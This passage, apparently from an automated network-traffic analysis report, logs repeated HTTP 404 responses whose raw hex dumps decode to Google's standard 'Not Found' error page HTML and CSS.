69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:25:33 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:25:34 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:25:35 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:25:36 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:25:37 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:25:38 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 